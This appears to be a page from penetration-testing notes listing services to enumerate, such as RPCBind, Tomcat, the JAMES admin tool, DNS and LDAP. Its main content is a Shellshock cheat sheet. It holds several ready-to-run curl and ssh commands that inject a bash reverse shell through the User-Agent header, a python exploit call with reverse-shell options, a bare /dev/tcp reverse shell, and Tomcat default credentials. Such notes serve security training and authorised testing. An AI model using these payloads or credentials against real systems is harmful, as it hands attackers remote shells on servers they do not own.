Other Services Enumeration

RPCBind Port 111

rpcinfo –p x.x.x.x

Apache Tomcat Port 8080

default credentials : tomcat s3cret

Port 4555

JAMES Remote Administration Tool 2.3.2

Shellshock Vulnerability

curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" TARGETADDRESS/cgi-bin/status
curl -x ip:PORT -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/ip/1234 0>&1" ip/cgi-bin/status
ssh username@IPADDRESS '() { :;}; /bin/bash'
$ python shellshock.py payload=reverse rhost=ip lhost=ip lport=4444 pages=/cgi-bin/user.sh
https://www.exploit-db.com/exploits/34900
bash -i >& /dev/tcp/ip/8888 0>&1

shellshock Vulnerability
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/ip/1234 0>&1 " http://ip:80/cgi-bin/user.sh

Port 53

DNS Zone Transfer

Active Directory / LDAP

Last updated

Was this helpful?